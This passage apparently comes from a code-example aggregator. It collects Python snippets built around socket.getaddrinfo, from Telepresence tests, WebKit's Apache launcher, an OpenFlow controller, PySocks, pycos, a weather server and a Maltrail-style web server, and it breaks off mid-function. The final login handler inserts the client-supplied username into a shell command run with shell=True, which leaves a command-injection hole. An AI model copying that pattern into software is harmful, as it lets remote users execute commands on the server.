    # because we run Telepresence once with _all_ of these as ``--also-proxy``
    # arguments.  We want to make sure each case works so we don't want
    # overlapping addresses where an argument of form might work and cause it
    # to appear as though the other cases are also working.  Instead, with a
    # different address each time, each form must be working.
    _an_ip = next(_httpbin)[4][0]
    ALSO_PROXY_HOSTNAME = AlsoProxy(
        # This is just any domain name that resolves to _one_ IP address that
        # will serve up httpbin.org.  See #379.
        gethostbyaddr(_an_ip)[0],
        _an_ip,
    )

    # This time we're exercising Telepresence support for specifying an IP
    # address literal to ``--also-proxy``.
    _an_ip = next(_httpbin)[4][0]
    ALSO_PROXY_IP = AlsoProxy(
        _an_ip,
        _an_ip,
    )

    # This time exercising support for specifying an IP network to
    # ``--also-proxy``.
    _an_ip = next(_httpbin)[4][0]
    ALSO_PROXY_CIDR = AlsoProxy(
        "{}/32".format(_an_ip),
        _an_ip,
    )

    HTTP_SERVER_SAME_PORT = HTTPServer(
        random_port(),
        None,
        random_name("same"),
    )
    print("HTTP Server same-port: {}".format(
        HTTP_SERVER_SAME_PORT.remote_port, ))
    HTTP_SERVER_DIFFERENT_PORT = HTTPServer(
        12360,
        random_port(),
        random_name("diff"),
    )
    print("HTTP Server diff-port: {}".format(
        HTTP_SERVER_SAME_PORT.remote_port, ))
    HTTP_SERVER_LOW_PORT = HTTPServer(
        12350,
        # This needs to be allocated from the privileged range.  Try to avoid
        # values that are obviously going to fail.  We only allocate one
        # low-value port number so we don't need special steps to avoid
        # reusing one.
        retry({22, 80, 111, 443}.__contains__, partial(randrange, 1, 1024)),
        random_name("low"),
    )

    _result = None

    def __init__(self, request, method, operation):
        self._request = request
        self.method = method
        self.operation = operation
        self._cleanup = []

    def __str__(self):
        return "Probe[{}, {}]".format(
            self.method.name,
            self.operation.name,
        )

    def result(self):
        if self._result is None:
            print("Launching {}".format(self))

            local_port = find_free_port()
            self.loopback_url = self.LOOPBACK_URL_TEMPLATE.format(local_port, )
            # This is a local web server that the Telepresence probe can try to
            # interact with to verify network routing to the host.
            p = Popen(
                # TODO Just cross our fingers and hope this port is available...
                [executable, "-m", "http.server",
                 str(local_port)],
                cwd=str(DIRECTORY),
            )
            self._cleanup.append(lambda: _cleanup_process(p))

            also_proxy = [
                self.ALSO_PROXY_HOSTNAME.argument,
                self.ALSO_PROXY_IP.argument,
                self.ALSO_PROXY_CIDR.argument,
            ]
            http_servers = [
                self.HTTP_SERVER_SAME_PORT,
                self.HTTP_SERVER_DIFFERENT_PORT,
                self.HTTP_SERVER_LOW_PORT,
            ]
            self._result = "FAILED"
            self._result = run_telepresence_probe(
                self._request, self.method, self.operation,
                self.DESIRED_ENVIRONMENT, {self.CLIENT_ENV_VAR: "FOO"},
                [self.loopback_url], self.QUESTIONABLE_COMMANDS,
                self.INTERESTING_PATHS, also_proxy, http_servers)
            self._cleanup.append(self.ensure_dead)
            self._cleanup.append(self.cleanup_resources)
        assert self._result != "FAILED"
        return self._result

    def cleanup(self):
        print("Cleaning up {}".format(self))
        for cleanup in self._cleanup:
            cleanup()

    def ensure_dead(self):
        """
        Make sure the Telepresence process launched by this Probe is no longer
        running.

        :raise Exception: If no Telepresence process was ever launched by this
            Probe in the first.
        """
        if self._result is None:
            raise Exception("Probe never launched")
        if self._result == "FAILED":
            raise Exception("Probe has failed")

        _cleanup_process(self._result.telepresence)

    def cleanup_resources(self):
        """
        Delete Kubernetes resources related to this Probe.

        :raise Exception: If no Telepresence process was ever launched by this
            Probe in the first place.
        """
        if self._result is None:
            raise Exception("Probe never launched")

        self.operation.cleanup_deployment(self._result.deployment_ident)
        self.operation.cleanup_service(self._result.deployment_ident)
        cleanup_namespace(self._result.deployment_ident.namespace)
Example #33
0
    def __init__(self, port_obj, output_dir, additional_dirs,
                 number_of_servers):
        super(ApacheHTTP, self).__init__(port_obj, output_dir)
        # We use the name "httpd" instead of "apache" to make our paths (e.g. the pid file: /tmp/WebKit/httpd.pid)
        # match old-run-webkit-tests: https://bugs.webkit.org/show_bug.cgi?id=63956
        self._name = 'httpd'
        self._log_prefixes = ('access_log', 'error_log')
        self._mappings = [{
            'port': 8000
        }, {
            'port': 8080
        }, {
            'port': 8443,
            'sslcert': True
        }]
        self._number_of_servers = number_of_servers

        self._pid_file = self._filesystem.join(self._runtime_path,
                                               '%s.pid' % self._name)

        executable = self._port_obj.path_to_apache()
        server_root = self._filesystem.dirname(
            self._filesystem.dirname(executable))

        test_dir = self._port_obj.layout_tests_dir()
        document_root = self._filesystem.join(test_dir, "http", "tests")
        js_test_resources_dir = self._filesystem.join(test_dir, "resources")
        forms_test_resources_dir = self._filesystem.join(
            test_dir, "fast", "forms", "resources")
        media_resources_dir = self._filesystem.join(test_dir, "media")
        mime_types_path = self._filesystem.join(test_dir, "http", "conf",
                                                "mime.types")
        cert_file = self._filesystem.join(test_dir, "http", "conf",
                                          "webkit-httpd.pem")
        inspector_sources_dir = self._port_obj.inspector_build_directory()

        self._access_log_path = self._filesystem.join(output_dir,
                                                      "access_log.txt")
        self._error_log_path = self._filesystem.join(output_dir,
                                                     "error_log.txt")

        self._is_win = self._port_obj.host.platform.is_win()

        start_cmd = [
            executable,
            '-f',
            '%s' % self._port_obj.path_to_apache_config_file(),
            '-C',
            'ServerRoot "%s"' % server_root,
            '-C',
            'DocumentRoot "%s"' % document_root,
            '-c',
            'Alias /js-test-resources "%s"' % js_test_resources_dir,
            '-c',
            'Alias /forms-test-resources "%s"' % forms_test_resources_dir,
            '-c',
            'Alias /media-resources "%s"' % media_resources_dir,
            '-c',
            'TypesConfig "%s"' % mime_types_path,
            '-c',
            'CustomLog "%s" common' % self._access_log_path,
            '-c',
            'ErrorLog "%s"' % self._error_log_path,
            '-c',
            'PidFile %s' % self._pid_file,
            '-c',
            'SSLCertificateFile "%s"' % cert_file,
            '-c',
            'Alias /inspector-sources "%s"' % inspector_sources_dir,
        ]

        if self._is_win:
            start_cmd += [
                '-c',
                "ThreadsPerChild %d" % (self._number_of_servers * 8)
            ]
        else:
            start_cmd += [
                '-c',
                "StartServers %d" % self._number_of_servers, '-c',
                "MinSpareServers %d" % self._number_of_servers, '-c',
                "MaxSpareServers %d" % self._number_of_servers, '-C',
                'User "%s"' %
                os.environ.get('USERNAME', os.environ.get('USER', '')), '-k',
                'start'
            ]

        enable_ipv6 = self._port_obj.http_server_supports_ipv6()
        # Perform part of the checks Apache's APR does when trying to listen to
        # a specific host/port. This allows us to avoid trying to listen to
        # IPV6 addresses when it fails on Apache. APR itself tries to call
        # getaddrinfo() again without AI_ADDRCONFIG if the first call fails
        # with EBADFLAGS, but that is not how it normally fails in our use
        # cases, so ignore that for now.
        # See https://bugs.webkit.org/show_bug.cgi?id=98602#c7
        try:
            socket.getaddrinfo('::1', 0, 0, 0, 0, socket.AI_ADDRCONFIG)
        except:
            enable_ipv6 = False

        for mapping in self._mappings:
            port = mapping['port']

            start_cmd += ['-C', "Listen 127.0.0.1:%d" % port]

            # We listen to both IPv4 and IPv6 loop-back addresses, but ignore
            # requests to 8000 from random users on network.
            # See https://bugs.webkit.org/show_bug.cgi?id=37104
            if enable_ipv6:
                start_cmd += ['-C', "Listen [::1]:%d" % port]

        if additional_dirs:
            self._start_cmd = start_cmd
            for alias, path in additional_dirs.iteritems():
                start_cmd += [
                    '-c',
                    'Alias %s "%s"' % (alias, path),
                    # Disable CGI handler for additional dirs.
                    '-c',
                    '<Location %s>' % alias,
                    '-c',
                    'RemoveHandler .cgi .pl',
                    '-c',
                    '</Location>'
                ]

        self._start_cmd = start_cmd
Example #34
0
    def __init__(self,
                 switch=None,
                 host='127.0.0.1',
                 port=6653,
                 max_pkts=1024,
                 force=False):
        Thread.__init__(self)
        # Socket related
        self.rcv_size = RCV_SIZE_DEFAULT
        self.listen_socket = None
        self.switch_socket = None
        self.switch_addr = None
        self.connect_cv = Condition()
        self.message_cv = Condition()
        self.tx_lock = Lock()

        # Used to wake up the event loop from another thread
        self.waker = ofutils.EventDescriptor()

        # Counters
        self.socket_errors = 0
        self.parse_errors = 0
        self.packets_total = 0
        self.packets_expired = 0
        self.packets_handled = 0
        self.poll_discards = 0

        # State
        self.sync = Lock()
        self.handlers = {}
        self.keep_alive = False
        self.active = True
        self.initial_hello = True

        # OpenFlow message/packet queue
        # Protected by the packets_cv lock / condition variable
        self.packets = []
        self.packets_cv = Condition()
        self.packet_in_count = 0

        # Settings
        self.max_pkts = max_pkts
        self.switch = switch
        self.passive = not self.switch
        self.force = force
        self.host = host
        self.port = port
        self.dbg_state = "init"
        self.logger = logging.getLogger("controller")
        self.filter_packet_in = False  # Drop "excessive" packet ins
        self.pkt_in_run = 0  # Count on run of packet ins
        self.pkt_in_filter_limit = 50  # Count on run of packet ins
        self.pkt_in_dropped = 0  # Total dropped packet ins
        self.transact_to = 15  # Transact timeout default value; add to config

        # Transaction and message type waiting variables
        #   xid_cv: Condition variable (semaphore) for packet waiters
        #   xid: Transaction ID being waited on
        #   xid_response: Transaction response message
        self.xid_cv = Condition()
        self.xid = None
        self.xid_response = None

        self.buffered_input = ""

        # Create listen socket
        if self.passive:
            self.logger.info("Create/listen at " + self.host + ":" +
                             str(self.port))
            ai = socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC,
                                    socket.SOCK_STREAM, 0, socket.AI_PASSIVE)
            # Use first returned addrinfo
            (family, socktype, proto, name, sockaddr) = ai[0]
            self.listen_socket = socket.socket(family, socktype)
            self.listen_socket.setsockopt(socket.SOL_SOCKET,
                                          socket.SO_REUSEADDR, 1)
            self.listen_socket.bind(sockaddr)
            self.listen_socket.listen(LISTEN_QUEUE_SIZE)
def create_connection(dest_pair,
                      timeout=None,
                      source_address=None,
                      proxy_type=None,
                      proxy_addr=None,
                      proxy_port=None,
                      proxy_rdns=True,
                      proxy_username=None,
                      proxy_password=None,
                      socket_options=None):
    """create_connection(dest_pair, *[, timeout], **proxy_args) -> socket object

    Like socket.create_connection(), but connects to proxy
    before returning the socket object.

    dest_pair - 2-tuple of (IP/hostname, port).
    **proxy_args - Same args passed to socksocket.set_proxy() if present.
    timeout - Optional socket timeout value, in seconds.
    source_address - tuple (host, port) for the socket to bind to as its source
    address before connecting (only for compatibility)
    """
    # Remove IPv6 brackets on the remote address and proxy address.
    remote_host, remote_port = dest_pair
    if remote_host.startswith("["):
        remote_host = remote_host.strip("[]")
    if proxy_addr and proxy_addr.startswith("["):
        proxy_addr = proxy_addr.strip("[]")

    err = None

    # Allow the SOCKS proxy to be on IPv4 or IPv6 addresses.
    for r in socket.getaddrinfo(proxy_addr, proxy_port, 0, socket.SOCK_STREAM):
        family, socket_type, proto, canonname, sa = r
        sock = None
        try:
            sock = socksocket(family, socket_type, proto)

            if socket_options:
                for opt in socket_options:
                    sock.setsockopt(*opt)

            if isinstance(timeout, (int, float)):
                sock.settimeout(timeout)

            if proxy_type:
                sock.set_proxy(proxy_type, proxy_addr, proxy_port, proxy_rdns,
                               proxy_username, proxy_password)
            if source_address:
                sock.bind(source_address)

            sock.connect((remote_host, remote_port))
            return sock

        except (socket.error, ProxyConnectionError) as e:
            err = e
            if sock:
                sock.close()
                sock = None

    if err:
        raise err

    raise socket.error("gai returned empty list.")
Example #36
0
def main(boardType, tempoalboot):
    global WatchDog
    _thread.start_new_thread(WatchDogFun, ())

    print(
        "\n=====================================\nWelcome to Wheather App on "
        + str(boardType) + ".....\n=====================================\n")
    counterK = 0
    ResetCsvFile = False
    wait = 0  # for TIME WAIT mgmt
    try:
        addrListen = socket.getaddrinfo('0.0.0.0', 80)[0][-1]
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(mainAppConstants.SOCKETTIMEOUT)
        s.bind(addrListen)
        s.listen(1)
        print("first allocation", s.fileno())
    except:
        wait = 1
        s.close()
        print('errore in first socket allocation')

    while True:
        WatchDog = (WatchDog + 1) % 20
        wait = 0
        try:
            if s.fileno() == -1:
                print('file no = -1')
                addrListen = socket.getaddrinfo('0.0.0.0', 80)[0][-1]
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.settimeout(mainAppConstants.SOCKETTIMEOUT)
                s.bind(addrListen)
                s.listen(1)
                print("loop allocation", s.fileno())
            else:
                #print('else file no = ',s.fileno())
                pass
        except:
            print("EXCEPTION WHILE ALLOCATING SOCKET")
            wait = 1
            s.close()
            #return -1,ResetCsvFile

        #After MAX_SAMPLES_STORED samples
        if counterK == 0:
            #resets the content of html page
            fout = open('main_out.txt', 'w')
            fout.write('')
            fout.close()

            #starts new section in csv file
            fin = open('headers_download_file.txt', 'r')
            fout = open('dati.csv', 'a')
            for x in fin:
                fout.write(x)
            fout.close()
            fin.close()

        if ResetCsvFile:
            fout = open('main_out.txt', 'w')
            fout.write('')
            fout.close()

            fin = open('headers_download_file.txt', 'r')
            fout = open('dati.csv', 'w')
            for x in fin:
                fout.write(x)
            fout.close()
            fin.close()
            ResetCsvFile = False
        #Getting Samples
        stringaHtmlDati, dati = updateWheateherValues(boardType, counterK,
                                                      tempoalboot)
        #Updating html main page
        fout = open('main_out.txt', 'a')
        fout.write(stringaHtmlDati)
        fout.close()
        #Updating download file
        fout = open("dati.csv", "a")
        fout.write(dati)
        fout.close()

        counterK = (counterK + 1) % mainAppConstants.MAX_SAMPLES_STORED
        #print("counterK",counterK)
        '''
        #printing content of file dati.csv for debug purpose only
        f=open("dati.csv","r")
        with f:
            print(f.read())
        f.close()
        '''

        #verifies if in the meanwhile WiFiSTA came up
        activateNet.do_setupWiFiSTA()

        retCode, ResetCsvFile = startWebServer(boardType, s, addrListen)
        if wait == -1:
            print('\nWaiting for TIME SLEEP.....\n')
            utime.sleep(145)
Example #37
0
        def do_POST(self):
            form = cgi.FieldStorage(fp=self.rfile,
                                    headers=self.headers,
                                    environ={'REQUEST_METHOD': 'POST'})
            client_request = self.path[1:]

            if client_request == 'server_info':
                server = None
                max_tasks = 0
                for item in form.list:
                    if item.name == 'location':
                        m = re.match(HTTPServer.loc_re, item.value)
                        if m:
                            node = self._ctx._nodes.get(m.group(1))
                            if node:
                                server = node.servers.get(item.value)
                    elif item.name == 'limit':
                        try:
                            max_tasks = int(item.value)
                        except Exception:
                            pass
                if server:
                    if 0 < max_tasks < len(server.tasks):
                        rtasks = []
                        for i, rtask in enumerate(
                                dict_iter(server.tasks, 'values')):
                            if i >= max_tasks:
                                break
                            rtasks.append(rtask)
                    else:
                        rtasks = server.tasks.values()
                    show_args = self._ctx._show_args
                    rtasks = [{
                        'task':
                        str(rtask.task),
                        'name':
                        rtask.task.name,
                        'args':
                        ', '.join(str(arg)
                                  for arg in rtask.args) if show_args else '',
                        'kwargs':
                        ', '.join('%s=%s' % (key, val)
                                  for key, val in rtask.kwargs.items())
                        if show_args else '',
                        'start_time':
                        rtask.start_time
                    } for rtask in rtasks]
                    info = {
                        'location': str(server.location),
                        'status': server.status,
                        'tasks_submitted': server.tasks_submitted,
                        'tasks_done': server.tasks_done,
                        'tasks': rtasks,
                        'update_time': node.update_time
                    }
                else:
                    info = {}
                self.send_response(200)
                self.send_header('Content-Type',
                                 'application/json; charset=utf-8')
                self.end_headers()
                self.wfile.write(json.dumps(info).encode())
                return

            elif client_request == 'node_info':
                addr = None
                for item in form.list:
                    if item.name == 'host':
                        if re.match(HTTPServer.ip_re, item.value):
                            addr = item.value
                        else:
                            try:
                                info = socket.getaddrinfo(item.value, None)[0]
                                ip_addr = info[4][0]
                                if info[0] == socket.AF_INET6:
                                    ip_addr = re.sub(r'^0+', '', ip_addr)
                                    ip_addr = re.sub(r':0+', ':', ip_addr)
                                    ip_addr = re.sub(r'::+', '::', ip_addr)
                                addr = ip_addr
                            except Exception:
                                addr = item.value
                        break
                node = self._ctx._nodes.get(addr)
                if node:
                    info = {
                        'addr':
                        node.addr,
                        'name':
                        node.name,
                        'status':
                        node.status,
                        'update_time':
                        node.update_time,
                        'avail_info':
                        node.avail_info.__dict__,
                        'tasks_submitted':
                        node.tasks_submitted,
                        'tasks_done':
                        node.tasks_done,
                        'servers': [{
                            'location': str(server.location),
                            'tasks_submitted': server.tasks_submitted,
                            'tasks_done': server.tasks_done,
                            'tasks_running': len(server.tasks),
                            'update_time': node.update_time
                        } for server in node.servers.values()]
                    }
                else:
                    info = {}
                self.send_response(200)
                self.send_header('Content-Type',
                                 'application/json; charset=utf-8')
                self.end_headers()
                self.wfile.write(json.dumps(info).encode())
                return

            elif client_request == 'terminate_tasks':
                tasks = []
                for item in form.list:
                    if item.name == 'task':
                        try:
                            tasks.append(item.value)
                        except ValueError:
                            pycos.logger.debug(
                                'Terminate: task "%s" is invalid', item.value)

                terminated = []
                self._ctx._lock.acquire()
                for task in tasks:
                    s = task.split('@')
                    if len(s) != 2:
                        continue
                    location = s[1]
                    s = location.split(':')
                    if len(s) != 2:
                        continue
                    node = self._ctx._nodes.get(s[0])
                    if not node:
                        continue
                    server = node.servers.get(location)
                    if not server:
                        continue
                    rtask = server.tasks.get(task)
                    if rtask and rtask.task.terminate() == 0:
                        terminated.append(task)
                self._ctx._lock.release()
                self.send_response(200)
                self.send_header('Content-Type',
                                 'application/json; charset=utf-8')
                self.end_headers()
                self.wfile.write(json.dumps(terminated).encode())
                return

            elif client_request == 'update':
                for item in form.list:
                    if item.name == 'timeout':
                        try:
                            timeout = int(item.value)
                            if timeout < 1:
                                timeout = 0
                            self._ctx._poll_sec = timeout
                        except Exception:
                            pycos.logger.warning(
                                'HTTP client %s: invalid timeout "%s" ignored',
                                self.client_address[0], item.value)
                    elif item.name == 'show_task_args':
                        if item.value == 'true':
                            self._ctx._show_args = True
                        else:
                            self._ctx._show_args = False

                self.send_response(200)
                self.send_header('Content-Type', 'text/html')
                self.end_headers()
                return

            elif (client_request == 'suspend_node'
                  or client_request == 'resume_node'):
                method = getattr(self._ctx.computation, client_request)
                if not method:
                    return
                nodes = []
                for item in form.list:
                    if item.name == 'nodes':
                        nodes = json.loads(item.value)
                        break
                for node in nodes:
                    method(node)
                return

            elif (client_request == 'suspend_server'
                  or client_request == 'resume_server'):
                method = getattr(self._ctx.computation, client_request)
                if not method:
                    return
                servers = []
                for item in form.list:
                    if item.name == 'servers':
                        servers = json.loads(item.value)
                        break
                for loc in servers:
                    loc = loc.split(':')
                    if len(loc) != 2:
                        continue
                    try:
                        loc = pycos.Location(loc[0], loc[1])
                    except Exception:
                        continue
                    method(loc)
                return

            else:
                pycos.logger.debug('Bad POST request from %s: %s',
                                   self.client_address[0], client_request)
                self.send_error(400)
                return
Example #38
0
 def __init__(self, slave_ip, slave_port=502, timeout=5):
     self._sock = socket.socket()
     self._sock.connect(socket.getaddrinfo(slave_ip, slave_port)[0][-1])
     self._sock.settimeout(timeout)
Example #39
0
import socket

seeders = [
    'bwkseed.mempool.pw', 'bwkseed1.fantasygoldcrypto.com',
    'bwkseed2.fantasygoldcrypto.com', 'bwkseed3.fantasygoldcrypto.com',
    'bwkseed4.fantasygoldcrypto.com', 'bwkseed5.fantasygoldcrypto.com',
    'bwkseed1.fantasygoldcrypto.site', 'bwkseed2.fantasygoldcrypto.site',
    'bwkseed3.fantasygoldcrypto.site', 'bwkseed4.fantasygoldcrypto.site',
    'bwkseed5.fantasygoldcrypto.site'
]

for seeder in seeders:
    try:
        ais = socket.getaddrinfo(seeder, 0)
    except socket.gaierror:
        ais = []

    # Prevent duplicates, need to update to check
    # for ports, can have multiple nodes on 1 ip.
    addrs = []
    for a in ais:
        addr = a[4][0]
        if addrs.count(addr) == 0:
            addrs.append(addr)

    print(seeder + ' = ' + str(len(addrs)))
Example #40
0
def start_httpd(address=None, port=None, join=False, pem=None):
    """
    Starts HTTP server
    """

    class ThreadingServer(_socketserver.ThreadingMixIn, _BaseHTTPServer.HTTPServer):
        def server_bind(self):
            self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            _BaseHTTPServer.HTTPServer.server_bind(self)

        def finish_request(self, *args, **kwargs):
            try:
                _BaseHTTPServer.HTTPServer.finish_request(self, *args, **kwargs)
            except:
                if config.SHOW_DEBUG:
                    traceback.print_exc()

    class SSLThreadingServer(ThreadingServer):
        def __init__(self, server_address, pem, HandlerClass):
            import OpenSSL  # python-openssl

            ThreadingServer.__init__(self, server_address, HandlerClass)
            ctx = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_2_METHOD)
            ctx.use_privatekey_file(pem)
            ctx.use_certificate_file(pem)
            self.socket = OpenSSL.SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
            self.server_bind()
            self.server_activate()

        def shutdown_request(self, request):
            try:
                request.shutdown()
            except:
                pass

    class ReqHandler(_BaseHTTPServer.BaseHTTPRequestHandler):
        def do_GET(self):
            path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "")
            params = {}
            content = None
            skip = False

            if hasattr(self, "data"):
                params.update(_urllib.parse.parse_qs(self.data))

            if query:
                params.update(_urllib.parse.parse_qs(query))

            for key in params:
                if params[key]:
                    params[key] = params[key][-1]

            if path == '/':
                path = "index.html"

            path = path.strip('/')
            extension = os.path.splitext(path)[-1].lower()

            if hasattr(self, "_%s" % path):
                content = getattr(self, "_%s" % path)(params)

            else:
                path = path.replace('/', os.path.sep)
                path = os.path.abspath(os.path.join(HTML_DIR, path)).strip()

                if not os.path.isfile(path) and os.path.isfile("%s.html" % path):
                    path = "%s.html" % path

                if any((config.IP_ALIASES,)) and self.path.split('?')[0] == "/js/main.js":
                    content = open(path, "rb").read()
                    content = re.sub(r"\bvar IP_ALIASES =.+", "var IP_ALIASES = {%s};" % ", ".join('"%s": "%s"' % (_.split(':', 1)[0].strip(), _.split(':', 1)[-1].strip()) for _ in config.IP_ALIASES), content)
                    self.send_response(_http_client.OK)
                elif ".." not in os.path.relpath(path, HTML_DIR) and os.path.isfile(path) and (extension not in DISABLED_CONTENT_EXTENSIONS or os.path.split(path)[-1] in CONTENT_EXTENSIONS_EXCLUSIONS):
                    mtime = time.gmtime(os.path.getmtime(path))
                    if_modified_since = self.headers.get(HTTP_HEADER.IF_MODIFIED_SINCE)

                    if if_modified_since and extension not in (".htm", ".html"):
                        if_modified_since = [_ for _ in if_modified_since.split(';') if _.upper().endswith("GMT")][0]
                        if time.mktime(mtime) <= time.mktime(time.strptime(if_modified_since, HTTP_TIME_FORMAT)):
                            self.send_response(_http_client.NOT_MODIFIED)
                            self.send_header(HTTP_HEADER.CONNECTION, "close")
                            skip = True

                    if not skip:
                        content = open(path, "rb").read()
                        last_modified = time.strftime(HTTP_TIME_FORMAT, mtime)
                        self.send_response(_http_client.OK)
                        self.send_header(HTTP_HEADER.CONNECTION, "close")
                        self.send_header(HTTP_HEADER.CONTENT_TYPE, mimetypes.guess_type(path)[0] or "application/octet-stream")
                        self.send_header(HTTP_HEADER.LAST_MODIFIED, last_modified)

                        # For CSP policy directives see: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/
                        self.send_header(HTTP_HEADER.CONTENT_SECURITY_POLICY, "default-src 'self'; style-src 'self' 'unsafe-inline'; img-src * blob:; " +
                                                                              "script-src 'self' 'unsafe-eval' https://stat.ripe.net; " +
                                                                              "frame-src *; object-src 'none'; block-all-mixed-content;")
                        if extension not in (".htm", ".html"):
                            self.send_header(HTTP_HEADER.EXPIRES, "Sun, 17-Jan-2038 19:14:07 GMT")        # Reference: http://blog.httpwatch.com/2007/12/10/two-simple-rules-for-http-caching/
                            self.send_header(HTTP_HEADER.CACHE_CONTROL, "max-age=3600, must-revalidate")  # Reference: http://stackoverflow.com/a/5084555
                        else:
                            self.send_header(HTTP_HEADER.CACHE_CONTROL, "no-cache")

                else:
                    self.send_response(_http_client.NOT_FOUND)
                    self.send_header(HTTP_HEADER.CONNECTION, "close")
                    content = b'<!DOCTYPE html><html lang="en"><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL %s was not found on this server.</p></body></html>' % self.path.split('?')[0]

            if content is not None:
                if isinstance(content, six.text_type):
                    content = content.encode(UNICODE_ENCODING)

                for match in re.finditer(b"<\\!(\\w+)\\!>", content):
                    name = match.group(1).decode(UNICODE_ENCODING)
                    _ = getattr(self, "_%s" % name.lower(), None)
                    if _:
                        content = self._format(content, **{ name: _() })

                if "gzip" in self.headers.get(HTTP_HEADER.ACCEPT_ENCODING, ""):
                    self.send_header(HTTP_HEADER.CONTENT_ENCODING, "gzip")
                    _ = six.BytesIO()
                    compress = gzip.GzipFile("", "w+b", 9, _)
                    compress._stream = _
                    compress.write(content)
                    compress.flush()
                    compress.close()
                    content = compress._stream.getvalue()

                self.send_header(HTTP_HEADER.CONTENT_LENGTH, str(len(content)))

            self.end_headers()

            try:
                if content:
                    self.wfile.write(content)

                self.wfile.flush()
            except:
                pass

        def do_POST(self):
            length = self.headers.get(HTTP_HEADER.CONTENT_LENGTH)
            data = self.rfile.read(int(length)).decode(UNICODE_ENCODING)
            data = _urllib.parse.unquote_plus(data)
            self.data = data
            self.do_GET()

        def get_session(self):
            retval = None
            cookie = self.headers.get(HTTP_HEADER.COOKIE)

            if cookie:
                match = re.search(r"%s\s*=\s*([^;]+)" % SESSION_COOKIE_NAME, cookie)
                if match:
                    session = match.group(1)
                    if session in SESSIONS:
                        if SESSIONS[session].client_ip != self.client_address[0]:
                            pass
                        elif SESSIONS[session].expiration > time.time():
                            retval = SESSIONS[session]
                        else:
                            del SESSIONS[session]

            if retval is None and not config.USERS:
                retval = AttribDict({"username": "******"})

            return retval

        def delete_session(self):
            cookie = self.headers.get(HTTP_HEADER.COOKIE)

            if cookie:
                match = re.search(r"%s=(.+)" % SESSION_COOKIE_NAME, cookie)
                if match:
                    session = match.group(1)
                    if session in SESSIONS:
                        del SESSIONS[session]

        def version_string(self):
            return "%s/%s" % (NAME, self._version())

        def end_headers(self):
            if not hasattr(self, "_headers_ended"):
                _BaseHTTPServer.BaseHTTPRequestHandler.end_headers(self)
                self._headers_ended = True

        def log_message(self, format, *args):
            return

        def finish(self):
            try:
                _BaseHTTPServer.BaseHTTPRequestHandler.finish(self)
            except:
                if config.SHOW_DEBUG:
                    traceback.print_exc()

        def _version(self):
            version = VERSION

            try:
                for line in open(os.path.join(os.path.dirname(__file__), "settings.py"), 'r'):
                    match = re.search(r'VERSION = "([^"]*)', line)
                    if match:
                        version = match.group(1)
                        break
            except:
                pass

            return version

        def _statics(self):
            latest = max(glob.glob(os.path.join(os.path.dirname(__file__), "..", "trails", "static", "malware", "*.txt")), key=os.path.getmtime)
            return "/%s" % datetime.datetime.fromtimestamp(os.path.getmtime(latest)).strftime(DATE_FORMAT)

        def _logo(self):
            if config.HEADER_LOGO:
                retval = config.HEADER_LOGO
            else:
                retval = '<img src="images/mlogo.png" style="width: 25px">altrail'

            return retval

        def _format(self, content, **params):
            if content:
                for key, value in params.items():
                    content = content.replace(b"<!%s!>" % key.encode(UNICODE_ENCODING), value.encode(UNICODE_ENCODING))

            return content

        def _login(self, params):
            valid = False

            if params.get("username") and params.get("hash") and params.get("nonce"):
                if params.get("nonce") not in DISPOSED_NONCES:
                    DISPOSED_NONCES.add(params.get("nonce"))
                    for entry in (config.USERS or []):
                        entry = re.sub(r"\s", "", entry)
                        username, stored_hash, uid, netfilter = entry.split(':')

                        try:
                            uid = int(uid)
                        except ValueError:
                            uid = None

                        if username == params.get("username"):
                            try:
                                if params.get("hash") == hashlib.sha256((stored_hash.strip() + params.get("nonce")).encode(UNICODE_ENCODING)).hexdigest():
                                    valid = True
                                    break
                            except:
                                if config.SHOW_DEBUG:
                                    traceback.print_exc()

            if valid:
                _ = os.urandom(SESSION_ID_LENGTH)
                session_id = _.hex() if hasattr(_, "hex") else _.encode("hex")
                expiration = time.time() + 3600 * SESSION_EXPIRATION_HOURS

                self.send_response(_http_client.OK)
                self.send_header(HTTP_HEADER.CONNECTION, "close")

                cookie = "%s=%s; expires=%s; path=/; HttpOnly" % (SESSION_COOKIE_NAME, session_id, time.strftime(HTTP_TIME_FORMAT, time.gmtime(expiration)))
                if config.USE_SSL:
                    cookie += "; Secure"
                if SESSION_COOKIE_FLAG_SAMESITE:
                    cookie += "; SameSite=strict"
                self.send_header(HTTP_HEADER.SET_COOKIE, cookie)

                if netfilter in ("", '*', "::", "0.0.0.0/0"):
                    netfilters = None
                else:
                    addresses = set()
                    netmasks = set()

                    for item in set(re.split(r"[;,]", netfilter)):
                        item = item.strip()
                        if '/' in item:
                            _ = item.split('/')[-1]
                            if _.isdigit() and int(_) >= 16:
                                lower = addr_to_int(item.split('/')[0])
                                mask = make_mask(int(_))
                                upper = lower | (0xffffffff ^ mask)
                                while lower <= upper:
                                    addresses.add(int_to_addr(lower))
                                    lower += 1
                            else:
                                netmasks.add(item)
                        elif '-' in item:
                            _ = item.split('-')
                            lower, upper = addr_to_int(_[0]), addr_to_int(_[1])
                            while lower <= upper:
                                addresses.add(int_to_addr(lower))
                                lower += 1
                        elif re.search(r"\d+\.\d+\.\d+\.\d+", item):
                            addresses.add(item)

                    netfilters = netmasks
                    if addresses:
                        netfilters.add(get_regex(addresses))

                SESSIONS[session_id] = AttribDict({"username": username, "uid": uid, "netfilters": netfilters, "mask_custom": config.ENABLE_MASK_CUSTOM and uid >= 1000, "expiration": expiration, "client_ip": self.client_address[0]})
            else:
                time.sleep(UNAUTHORIZED_SLEEP_TIME)
                self.send_response(_http_client.UNAUTHORIZED)
                self.send_header(HTTP_HEADER.CONNECTION, "close")

            self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
            content = "Login %s" % ("success" if valid else "failed")

            if not IS_WIN:
                try:
                    subprocess.check_output("logger -p auth.info -t \"%s[%d]\" \"%s password for %s from %s port %s\"" % (NAME.lower(), os.getpid(), "Accepted" if valid else "Failed", params.get("username"), self.client_address[0], self.client_address[1]), stderr=subprocess.STDOUT, shell=True)
                except Exception:
